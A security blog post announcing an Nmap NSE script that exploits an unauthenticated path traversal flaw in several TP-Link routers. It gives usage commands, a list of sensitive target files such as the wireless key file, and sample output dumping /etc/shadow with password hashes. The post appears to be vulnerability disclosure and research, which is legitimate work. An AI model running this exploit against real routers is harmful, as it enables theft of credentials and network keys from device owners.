calderpwn

http-tplink-dir-traversal

<![CDATA[

I wrote a NSE script to exploit a path traversal vulnerability in several TP-Link access points.

description = [[
Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
This vulnerability was confirmed in models WR740N, WR740ND and WR2543ND but there are several models that use the same HTTP server so I believe they could be vulnerable as well. I appreciate
any help confirming the vulnerability in other models.
Advisory:
Other interesting files:
* /tmp/topology.cnf (Wireless configuration)
* /tmp/ath0.ap_bss (Wireless encryption key)
]]
— @usage nmap -p80 –script http-tplink-dir-traversal.nse <target>
— @usage nmap -p80 -Pn -n –script http-tplink-dir-traversal.nse <target>
— @usage nmap -p80 –script http-tplink-dir-traversal.nse –script-args rfile=/etc/topology.conf -d -n -Pn <target>
— @output
— PORT STATE SERVICE REASON
— 80/tcp open http syn-ack
— | http-tplink-dir-traversal:
— | VULNERABLE:
— | Path traversal vulnerability in several TP-Link wireless routers
— | State: VULNERABLE (Exploitable)
— | Description:
— | Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
— | This vulnerability can be exploited remotely and without authenticatication.
— | Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
— | Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
— | Disclosure date: 2012-06-18
— | Extra information:
— | /etc/shadow :
— |
— | root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
— | Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
— | bin::10933:0:99999:7:::
— | daemon::10933:0:99999:7:::
— | adm::10933:0:99999:7:::
— | lp:*:10933:0:99999:7:::
— | sync:*:10933:0:99999:7:::
— | shutdown:*:10933:0:99999:7:::
— | halt:*:10933:0:99999:7:::
— | uucp:*:10933:0:99999:7:::
— | operator:*:10933:0:99999:7:::
— | nobody::10933:0:99999:7:::
— | ap71::10933:0:99999:7:::
— |
— | References:
— @args http-tplink-dir-traversal.rfile Remote file to download. Default: /etc/passwd
— @args http-tplink-dir-traversal.outfile If set it saves the remote file to this location.

 

Resources 

http-tplink-dir-traversal on Github

dotdotpwn log

]]>

Leave a comment

cat /etc/about-me

@calderpwn spends peaceful days in Cozumel, a beautiful island in the Caribbean, working on remote projects, learning new technologies, developing new tools, or simply enjoying the beach.

Join the mailing list

Stay updated with the latest tips and other news of my developments by joining the newsletter. It is very low volume, I promise :)

Categories

Tags

802.11 android azure ble book books calderpwn catsniffer Conferences cozumel General GSoC hopper infosec ios iot iot hacking iot security mexico mobile security nmap nordic nostarch iot hacking oneplus owasp owasp latam tour owasp mstg owasp riviera maya Publications Research reversing scripting source code auditing sql injection tips Tutorials wifi windows wireshark

Recent Posts

Favs

DragonJAR

PWNLAB

Websec

ThreatPatrol